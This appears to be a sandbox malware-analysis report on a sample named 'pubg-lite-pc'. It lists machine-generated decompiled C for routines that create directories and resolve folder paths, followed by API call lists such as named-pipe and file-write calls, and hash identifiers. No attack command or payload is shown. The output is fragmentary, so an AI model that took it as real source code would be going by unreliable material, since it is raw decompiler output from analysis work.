                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D983250 Relevance: 4.7, APIs: 3, Instructions: 168COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E6D983250(signed int __ebx, WCHAR** __ecx, long __edi, signed int _a516, void* _a520) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				char _v17;
				struct _SECURITY_ATTRIBUTES* _v20;
				WCHAR* _v24;
				signed int* _v28;
				intOrPtr _v32;
				struct _SECURITY_ATTRIBUTES* _v36;
				signed int _v40;
				struct _SECURITY_ATTRIBUTES* _v44;
				char _v600;
				void* __esi;
				signed int _t67;
				void* _t70;
				void* _t72;
				signed int _t75;
				signed int _t76;
				signed int _t78;
				struct HINSTANCE__* _t81;
				signed int _t84;
				signed int _t92;
				signed int _t93;
				signed int _t97;
				signed int* _t99;
				int _t108;
				signed int* _t128;
				signed int _t129;
				signed int _t135;
				void* _t153;
				short* _t157;
				signed int _t162;
				signed int* _t163;
				signed int _t164;
				void* _t168;
				signed int _t172;
				signed int _t173;
				signed int _t177;

				_t158 = __edi;
				_t123 = __ebx;
				_t172 = _t177;
				_push(0xffffffff);
				_push(0x6d9b9215);
				_push( *[fs:0x0]);
				_push(__ebx);
				_push(__edi);
				_t67 =  *0x6d9e5024; // 0xe85bfa76
				_push(_t67 ^ _t172);
				 *[fs:0x0] =  &_v16;
				_t162 = __ecx; // executed
				_t70 = E6D982CF0(__ecx, __edi, __ecx); // executed
				if(_t70 == 0) {
					__eflags = PathIsUNCW( *__ecx) - 1;
					_v44 = 0;
					_v40 = 0;
					_v17 = __eflags == 0;
					_v36 = 0;
					_v8 = 0;
					_t152 = _t162;
					_t128 =  &_v44;
					_t72 = E6D982EE0(__ebx, _t128, _t162, __edi, __eflags);
					__eflags = _v40;
					if(_v40 <= 0) {
						L21:
						L6D96FDD0(_t72, 0xc000008c, 1);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t173 =  &_v600;
						_t75 =  *0x6d9e5024; // 0xe85bfa76
						_t76 = _t75 ^ _t173;
						_a516 = _t76;
						 *[fs:0x0] =  &_v16;
						_t163 = _t128;
						_v24 = _t163;
						_t78 = _t173;
						_v28 = _t163;
						_v20 = 0;
						__imp__SHGetSpecialFolderPathW(0, _t78, 0x1c, 0, _t76, _t162,  *[fs:0x0], 0x6d9b926e, 0xffffffff, _t172); // executed
						__eflags = _t78;
						if(_t78 == 0) {
							_t129 = L6D966B50();
							__eflags = _t129;
							if(_t129 == 0) {
								goto L32;
							} else {
								_t84 =  *((intOrPtr*)( *_t129 + 0xc))() + 0x10;
								__eflags = _t84;
								 *_t163 = _t84;
								goto L31;
							}
						} else {
							_t129 = L6D966B50();
							__eflags = _t129;
							if(_t129 == 0) {
								L32:
								E6D966820(0x80004005);
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t163);
								_t164 = _t129;
								_t81 =  *(_t164 + 4);
								__eflags = _t81;
								if(_t81 != 0) {
									_t81 = FreeLibrary(_t81);
									 *(_t164 + 4) = 0;
								}
								return _t81;
							} else {
								 *_t163 =  *((intOrPtr*)( *_t129 + 0xc))() + 0x10;
								_v8 = 1;
								_t92 = L6D967E50(_t163, _t152, _t173);
								__eflags = _t92;
								if(_t92 == 0) {
									_t135 = _t173;
									_t153 = _t135 + 2;
									do {
										_t93 =  *_t135;
										_t135 = _t135 + 2;
										__eflags = _t93;
									} while (_t93 != 0);
									__eflags = _t135 - _t153;
									L6D9666D0(_t123, _t163, _t158, _t163, _t173, _t135 - _t153 >> 1);
								}
								L31:
								_v8 = 0;
								_v20 = 1;
								 *[fs:0x0] = _v16;
								__eflags = _a516 ^ _t173;
								return L6D98A13F(_a516 ^ _t173);
							}
						}
					} else {
						L6D966270(__ebx, __edi, _t162, _v44);
						_v8 = 1;
						_t158 = 0;
						_t97 = _v40;
						_t123 = __ebx | 0xffffffff;
						_v32 = _t97;
						_t15 = _t158 + 1; // 0x1
						_t162 = _t15;
						__eflags = _t97 - _t162;
						if(_t97 <= _t162) {
							L18:
							__eflags = _t158 - 0xb7;
							_t168 =  !=  ? _t158 : 0;
							_v8 = 0;
							_t99 =  &(_v28[0xfffffffffffffffc]);
							asm("lock xadd [eax+0xc], ebx");
							__eflags = _t123 - 1;
							if(_t123 - 1 <= 0) {
								 *((intOrPtr*)( *( *_t99) + 4))(_t99);
							}
							_v8 = 0xffffffff;
							L6D96FB20();
							 *[fs:0x0] = _v16;
							return _t168;
						} else {
							while(1) {
								L6D966270(_t123, _t158, _t162,  &_v28);
								_v8 = 2;
								_t128 =  &_v24;
								_t72 = L6D966370(_t123, _t128, "\\", 1);
								__eflags = _t162 - _v40;
								if(_t162 >= _v40) {
									goto L21;
								}
								L6D966370(_t123,  &_v24,  *((intOrPtr*)(_v44 + _t162 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_v44 + _t162 * 4)) - 0xc)));
								_t108 = CreateDirectoryW(_v24, 0); // executed
								__eflags = _t108;
								if(_t108 != 0) {
									L9:
									_t128 =  &_v28;
									_t72 = L6D966370(_t123, _t128, "\\", 1);
									__eflags = _t162 - _v40;
									if(_t162 >= _v40) {
										goto L21;
									} else {
										L6D966370(_t123,  &_v28,  *((intOrPtr*)(_v44 + _t162 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_v44 + _t162 * 4)) - 0xc)));
										_v8 = 1;
										_t152 =  &(_v24[0xfffffffffffffff8]);
										asm("lock xadd [edx+0xc], eax");
										__eflags = _t123 - 1;
										if(_t123 - 1 <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t152)) + 4))(_t152);
										}
										_t162 = 1 + _t162;
										__eflags = _t162 - _v32;
										if(_t162 < _v32) {
											continue;
										} else {
											goto L18;
										}
									}
								} else {
									_t158 = GetLastError();
									__eflags = _t158 - 0xb7;
									if(_t158 == 0xb7) {
										goto L9;
									} else {
										__eflags = _v17;
										if(_v17 == 0) {
											__eflags = _t162 - 1;
											if(_t162 > 1) {
												E6D982BF0(_t152, _t158, _t162);
											}
											_v8 = 1;
											_t157 =  &(_v24[0xfffffffffffffff8]);
											asm("lock xadd [edx+0xc], eax");
											__eflags = _t123 - 1;
											if(_t123 - 1 <= 0) {
												 *((intOrPtr*)( *( *_t157) + 4))(_t157);
											}
											goto L18;
										} else {
											goto L9;
										}
									}
								}
								goto L35;
							}
							goto L21;
						}
					}
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
				L35:
			}








































                                                                                                0x6d983250
                                                                                                0x6d983250
                                                                                                0x6d983251
                                                                                                0x6d983253
                                                                                                0x6d983255
                                                                                                0x6d983260
                                                                                                0x6d983264
                                                                                                0x6d983266
                                                                                                0x6d983267
                                                                                                0x6d98326e
                                                                                                0x6d983272
                                                                                                0x6d983278
                                                                                                0x6d98327a
                                                                                                0x6d983281
                                                                                                0x6d98329f
                                                                                                0x6d9832a2
                                                                                                0x6d9832a9
                                                                                                0x6d9832b0
                                                                                                0x6d9832b4
                                                                                                0x6d9832bb
                                                                                                0x6d9832c2
                                                                                                0x6d9832c4
                                                                                                0x6d9832c7
                                                                                                0x6d9832cc
                                                                                                0x6d9832d0
                                                                                                0x6d983428
                                                                                                0x6d98342f
                                                                                                0x6d983434
                                                                                                0x6d983435
                                                                                                0x6d983436
                                                                                                0x6d983437
                                                                                                0x6d983438
                                                                                                0x6d983439
                                                                                                0x6d98343a
                                                                                                0x6d98343b
                                                                                                0x6d98343c
                                                                                                0x6d98343d
                                                                                                0x6d98343e
                                                                                                0x6d98343f
                                                                                                0x6d983441
                                                                                                0x6d98345f
                                                                                                0x6d983464
                                                                                                0x6d983466
                                                                                                0x6d983471
                                                                                                0x6d983477
                                                                                                0x6d983479
                                                                                                0x6d983480
                                                                                                0x6d983483
                                                                                                0x6d983489
                                                                                                0x6d983490
                                                                                                0x6d983496
                                                                                                0x6d983498
                                                                                                0x6d9834f2
                                                                                                0x6d9834f4
                                                                                                0x6d9834f6
                                                                                                0x00000000
                                                                                                0x6d9834f8
                                                                                                0x6d9834fd
                                                                                                0x6d9834fd
                                                                                                0x6d983500
                                                                                                0x00000000
                                                                                                0x6d983500
                                                                                                0x6d98349a
                                                                                                0x6d98349f
                                                                                                0x6d9834a1
                                                                                                0x6d9834a3
                                                                                                0x6d983533
                                                                                                0x6d983538
                                                                                                0x6d98353d
                                                                                                0x6d98353e
                                                                                                0x6d98353f
                                                                                                0x6d983540
                                                                                                0x6d983541
                                                                                                0x6d983543
                                                                                                0x6d983546
                                                                                                0x6d983548
                                                                                                0x6d98354b
                                                                                                0x6d983551
                                                                                                0x6d983551
                                                                                                0x6d983559
                                                                                                0x6d9834a9
                                                                                                0x6d9834b1
                                                                                                0x6d9834b3
                                                                                                0x6d9834c0
                                                                                                0x6d9834c5
                                                                                                0x6d9834c7
                                                                                                0x6d9834c9
                                                                                                0x6d9834cc
                                                                                                0x6d9834d0
                                                                                                0x6d9834d0
                                                                                                0x6d9834d3
                                                                                                0x6d9834d6
                                                                                                0x6d9834d6
                                                                                                0x6d9834db
                                                                                                0x6d9834e6
                                                                                                0x6d9834e6
                                                                                                0x6d983502
                                                                                                0x6d983502
                                                                                                0x6d983509
                                                                                                0x6d983515
                                                                                                0x6d983524
                                                                                                0x6d983532
                                                                                                0x6d983532
                                                                                                0x6d9834a3
                                                                                                0x6d9832d6
                                                                                                0x6d9832dc
                                                                                                0x6d9832e1
                                                                                                0x6d9832e5
                                                                                                0x6d9832e7
                                                                                                0x6d9832ea
                                                                                                0x6d9832ed
                                                                                                0x6d9832f0
                                                                                                0x6d9832f0
                                                                                                0x6d9832f3
                                                                                                0x6d9832f5
                                                                                                0x6d9833de
                                                                                                0x6d9833e0
                                                                                                0x6d9833e6
                                                                                                0x6d9833e9
                                                                                                0x6d9833f0
                                                                                                0x6d9833f3
                                                                                                0x6d9833f9
                                                                                                0x6d9833fb
                                                                                                0x6d983402
                                                                                                0x6d983402
                                                                                                0x6d983405
                                                                                                0x6d98340f
                                                                                                0x6d983419
                                                                                                0x6d983427
                                                                                                0x6d983300
                                                                                                0x6d983300
                                                                                                0x6d983307
                                                                                                0x6d98330c
                                                                                                0x6d983310
                                                                                                0x6d98331a
                                                                                                0x6d98331f
                                                                                                0x6d983322
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d983335
                                                                                                0x6d98333f
                                                                                                0x6d983345
                                                                                                0x6d983347
                                                                                                0x6d98335f
                                                                                                0x6d983366
                                                                                                0x6d983369
                                                                                                0x6d98336e
                                                                                                0x6d983371
                                                                                                0x00000000
                                                                                                0x6d983377
                                                                                                0x6d983384
                                                                                                0x6d983389
                                                                                                0x6d983392
                                                                                                0x6d983395
                                                                                                0x6d98339b
                                                                                                0x6d98339d
                                                                                                0x6d9833a4
                                                                                                0x6d9833a4
                                                                                                0x6d9833a7
                                                                                                0x6d9833a8
                                                                                                0x6d9833ab
                                                                                                0x00000000
                                                                                                0x6d9833b1
                                                                                                0x00000000
                                                                                                0x6d9833b1
                                                                                                0x6d9833ab
                                                                                                0x6d983349
                                                                                                0x6d98334f
                                                                                                0x6d983351
                                                                                                0x6d983357
                                                                                                0x00000000
                                                                                                0x6d983359
                                                                                                0x6d983359
                                                                                                0x6d98335d
                                                                                                0x6d9833b3
                                                                                                0x6d9833b6
                                                                                                0x6d9833bb
                                                                                                0x6d9833bb
                                                                                                0x6d9833c0
                                                                                                0x6d9833c9
                                                                                                0x6d9833cc
                                                                                                0x6d9833d2
                                                                                                0x6d9833d4
                                                                                                0x6d9833db
                                                                                                0x6d9833db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d98335d
                                                                                                0x6d983357
                                                                                                0x00000000
                                                                                                0x6d983347
                                                                                                0x00000000
                                                                                                0x6d983300
                                                                                                0x6d9832f5
                                                                                                0x6d983283
                                                                                                0x6d983288
                                                                                                0x6d983296
                                                                                                0x6d983296
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • PathIsUNCW.SHLWAPI(?,E85BFA76,00000000,?,?,00000010,?,?,?,E85BFA76,?,?), ref: 6D983299
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,6D9D16C4,00000001,?,00000000,?), ref: 6D98333F
                                                                                                • GetLastError.KERNEL32 ref: 6D983349
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryErrorLastPath
                                                                                                • String ID:
                                                                                                • API String ID: 953296794-0
                                                                                                • Opcode ID: e4566ccc33eacef1c0e742dc08a101c8d70ad2ba79891997bdd9de8eeed59817
                                                                                                • Instruction ID: 987bd91769611f2083c6adf2254cb0d42a9255f5ac37f6fa07df4d04eb9e4a47
                                                                                                • Opcode Fuzzy Hash: e4566ccc33eacef1c0e742dc08a101c8d70ad2ba79891997bdd9de8eeed59817
                                                                                                • Instruction Fuzzy Hash: 5551D031904149DFDB01DFA8C884BEEFBB4EF15728F1182A9E515E72A1DB31D905CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009FDD80 Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(009FEB5D,40000000,00000001,00000000,00000002,00000080,00000000,F4D3B90A,00000001), ref: 009FDDE2
                                                                                                • WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000), ref: 009FDE78
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009FDEAF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1065093856-0
                                                                                                • Opcode ID: d034559aad7d5f64be07ac07df4e3f287b29044f4df39950ebca796cdce2ff9e
                                                                                                • Instruction ID: a9cbf95997eb245fc52abcddd221907be2e50d88347be69c386bb7a5714362c9
                                                                                                • Opcode Fuzzy Hash: d034559aad7d5f64be07ac07df4e3f287b29044f4df39950ebca796cdce2ff9e
                                                                                                • Instruction Fuzzy Hash: A1413471901219AFDF00DF98DD49BEEBBB8FF48314F20416AE500B7290DB745A04CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B3D40 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,F4D3B90A), ref: 009B3EE0
                                                                                                  • Part of subcall function 009B3FA0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 009B3FAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentFolderHeapPathProcessSpecialVariable
                                                                                                • String ID: USERPROFILE
                                                                                                • API String ID: 2976596683-2419442777
                                                                                                • Opcode ID: d1da0566852106f08369debe8905c9acefc792bf4d915c58a244d64027dd4f0e
                                                                                                • Instruction ID: a423dfe2e82692c6bb8adc17943596d5002060dc442dd881b64186a9ed9aedb6
                                                                                                • Opcode Fuzzy Hash: d1da0566852106f08369debe8905c9acefc792bf4d915c58a244d64027dd4f0e
                                                                                                • Instruction Fuzzy Hash: C161C271A01609DFDB14DFA8CE59BAEB7B8FF44320F14866DE815DB291DB309A04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EB2A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,F4D3B90A,?,00000010,?,?,00A66E8E,000000FF), ref: 009EB328
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                  • Part of subcall function 009EB140: ConnectNamedPipe.KERNEL32(?,00000000,F4D3B90A,?,000000FF,?,00000000,00A8BBB6,000000FF,?,009EB35A,000000FF,?,00000001), ref: 009EB17A
                                                                                                  • Part of subcall function 009EB140: GetLastError.KERNEL32(?,009EB35A,000000FF,?,00000001), ref: 009EB184
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectErrorFileHeapLastNamedPipeProcessWrite
                                                                                                • String ID: \\.\pipe\ToServer
                                                                                                • API String ID: 3105902539-63420281
                                                                                                • Opcode ID: 4a131e40041bda9bfa37ac23100e59c7a2a535f26edf988a639ad92fd67e3f4a
                                                                                                • Instruction ID: c8941fb02a079ee2d839ab5e6a19efd45dc2e0ba358727bdfa78623fceebea2d
                                                                                                • Opcode Fuzzy Hash: 4a131e40041bda9bfa37ac23100e59c7a2a535f26edf988a639ad92fd67e3f4a
                                                                                                • Instruction Fuzzy Hash: 7B41AB71605254EFDB04CF59D805BAEB7A8EF49324F00826EE9119B381DBB5AD008B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00963E50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00963F21
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow
                                                                                                • String ID: $
                                                                                                • API String ID: 1378638983-3993045852
                                                                                                • Opcode ID: 80bfe9d20ca08edd06c3dfc9af6dee6f052da775b9a0f81344e92f9c0a47aa9e
                                                                                                • Instruction ID: afdc365c9d727052606169ea6d1832e6c4127bb89b47fc24c934f6c7d7c78e59
                                                                                                • Opcode Fuzzy Hash: 80bfe9d20ca08edd06c3dfc9af6dee6f052da775b9a0f81344e92f9c0a47aa9e
                                                                                                • Instruction Fuzzy Hash: A931CA71508380EFEB149F09C88471ABBF4FF89310F04855DF9988B295D3B6DA59CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A5B4BC Relevance: 3.2, APIs: 2, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00A5B057: GetOEMCP.KERNEL32(00000000,00A5B2C8,?,?,00A4A5D5,00A4A5D5,?,?,?), ref: 00A5B082
                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A5B30F,?,00000000,?,?,?,?,?,?,00A4A5D5), ref: 00A5B51A
                                                                                                • GetCPInfo.KERNEL32(00000000,00A5B30F,?,?,00A5B30F,?,00000000,?,?,?,?,?,?,00A4A5D5,?,?), ref: 00A5B55C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CodeInfoPageValid
                                                                                                • String ID:
                                                                                                • API String ID: 546120528-0
                                                                                                • Opcode ID: bd4e005987153f29a3469d72de4500a04e26e40d92d056649a540e4a2d2fb2e0
                                                                                                • Instruction ID: 18f37a6769ae66432824ec19a2051b9933b46cebde7c625f9c030af6ee383f32
                                                                                                • Opcode Fuzzy Hash: bd4e005987153f29a3469d72de4500a04e26e40d92d056649a540e4a2d2fb2e0
                                                                                                • Instruction Fuzzy Hash: D95156709203449EDB24CF75C4406BBBBF5FF40307F14406ED8968B652E734994ACBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009F0A70 Relevance: 3.2, APIs: 2, Instructions: 155COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 009F0AC2
                                                                                                • EndDialog.USER32(00000000,00000001), ref: 009F0AD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DialogWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2634769047-0
                                                                                                • Opcode ID: f6c85199f17b46aef4cf7392847ab7683ebc096e19a8dcbfdc6b1846e8570ca1
                                                                                                • Instruction ID: 1b70b1f0797a90304ec5272953f6b672ea3a9e0aba196b5b58af963afe5a3a1d
                                                                                                • Opcode Fuzzy Hash: f6c85199f17b46aef4cf7392847ab7683ebc096e19a8dcbfdc6b1846e8570ca1
                                                                                                • Instruction Fuzzy Hash: E4617A70A01749DFDB11CF68C948B5AFBF8EF49314F1482A9D449DB2A2E774EA04CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D983440 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 66%
                                                                                                			E6D983440(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				signed int _t19;
				signed int _t20;
				signed int _t22;
				struct HINSTANCE__* _t25;
				void* _t37;
				intOrPtr* _t42;
				signed int _t48;
				void* _t53;
				void* _t55;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t60;
				signed int _t61;
				void* _t63;

				_t61 = _t63 - 0x20c;
				_t19 =  *0x6d9e5024; // 0xe85bfa76
				_t20 = _t19 ^ _t61;
				 *(_t61 + 0x208) = _t20;
				 *[fs:0x0] = _t61 - 0xc;
				_t56 = __ecx;
				 *((intOrPtr*)(_t61 - 0x14)) = __ecx;
				_t22 = _t61;
				 *((intOrPtr*)(_t61 - 0x18)) = __ecx;
				 *(_t61 - 0x10) = 0;
				__imp__SHGetSpecialFolderPathW(0, _t22, 0x1c, 0, _t20, _t55,  *[fs:0x0], 0x6d9b926e, 0xffffffff, _t60); // executed
				if(_t22 == 0) {
					_t42 = L6D966B50();
					if(_t42 == 0) {
						goto L10;
					} else {
						 *_t56 =  *((intOrPtr*)( *_t42 + 0xc))() + 0x10;
						goto L9;
					}
				} else {
					_t42 = L6D966B50();
					if(_t42 == 0) {
						L10:
						E6D966820(0x80004005);
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t56);
						_t57 = _t42;
						_t25 =  *(_t57 + 4);
						if(_t25 != 0) {
							_t25 = FreeLibrary(_t25);
							 *(_t57 + 4) = 0;
						}
						return _t25;
					} else {
						 *_t56 =  *((intOrPtr*)( *_t42 + 0xc))() + 0x10;
						 *(_t61 - 4) = 1;
						if(L6D967E50(_t56, __edx, _t61) == 0) {
							_t48 = _t61;
							_t53 = _t48 + 2;
							do {
								_t37 =  *_t48;
								_t48 = _t48 + 2;
							} while (_t37 != 0);
							L6D9666D0(__ebx, _t56, __edi, _t56, _t61, _t48 - _t53 >> 1);
						}
						L9:
						 *(_t61 - 4) = 0;
						 *(_t61 - 0x10) = 1;
						 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
						return L6D98A13F( *(_t61 + 0x208) ^ _t61);
					}
				}
			}


















                                                                                                0x6d983441
                                                                                                0x6d98345f
                                                                                                0x6d983464
                                                                                                0x6d983466
                                                                                                0x6d983471
                                                                                                0x6d983477
                                                                                                0x6d983479
                                                                                                0x6d983480
                                                                                                0x6d983483
                                                                                                0x6d983489
                                                                                                0x6d983490
                                                                                                0x6d983498
                                                                                                0x6d9834f2
                                                                                                0x6d9834f6
                                                                                                0x00000000
                                                                                                0x6d9834f8
